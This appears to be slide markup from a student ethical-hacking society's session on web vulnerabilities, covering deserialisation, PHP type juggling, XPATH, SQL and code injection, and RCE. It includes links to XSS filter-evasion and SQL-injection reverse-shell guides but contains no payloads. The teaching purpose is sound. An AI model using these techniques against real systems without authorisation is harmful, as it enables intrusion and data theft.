              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigation? Don’t deserialise untrusted data!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p2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Deserialisation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Type Juggling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vulnerability occurs because of PHP’s weird behaviour comparing values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>For example, it tries to extract integers from strings:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(“7 Puppies” == 7) -&gt; True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(“Puppies” == 0) -&gt; True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This can cause issues if a type juggling comparison occurs in authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>XPATH Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Similar to SQL Injection, with a few syntax differences</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>May look the same initially - but this is handling XML data rather than SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Also possible to do password extraction attacks!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/XPATH_Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ippsec </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Unbalanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=L_FYYJPVywM&amp;t=2650s</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p2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Miscellaneous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Resources</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="923875"/>
            <a:ext cx="8520600" cy="41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900"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/Double_Encoding</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/support/xss-beating-html-sanitizing-filters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/contexts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://null-byte.wonderhowto.com/how-to/advanced-techniques-bypass-defeat-xss-filters-part-1-0190257/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://gosecure.github.io/presentations/2017-12-04-confoo/Bypassing%20Modern%20XSS%20Protections.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>SSTI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Mitigating the exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=JcOR9krOPFY&amp;t=2820s</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>SQLI</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Overview of attacks and mitigations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Gaining a shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://resources.infosecinstitute.com/topic/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Blind Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/sql-injection/blind</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>Repos</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://github.com/Twigonometry/Deserialisation-Demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://github.com/Twigonometry/CTF-Tools/blob/master/scripts/jpegify.sh</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Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.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63" name="Google Shape;63;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Any questions?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>To recap any of the basics, see our Juice Shop Sessions from first semester:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://shefesh.com/assets/wiki/Give%20it%20a%20Go%20-%20An%20Introduction%20to%20Web%20Hacking%20-%20PDF.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://shefesh.com/assets/wiki/Juice%20Shop%20Session%20-%20PDF.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>And keep an eye on the CTF Tools repository for an example of the Blind SQLI script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(if I get round to it...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p3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That’s about it!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439325" y="4034250"/>
            <a:ext cx="3663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rgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>www.shefesh.com</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Thanks for coming!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924050" y="1111100"/>
            <a:ext cx="2693850" cy="26996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Upcoming Sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p3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What’s up next?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.shefesh.com/sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p3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Next Week: Game Hacking/Hack the Box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Easter Break!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lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478965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Code Injection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Why is this bad?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Arbitrary Single Commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Web Shells (PHP, Reverse Shells etc)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Untrusted Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Anything</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>supplied by a user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
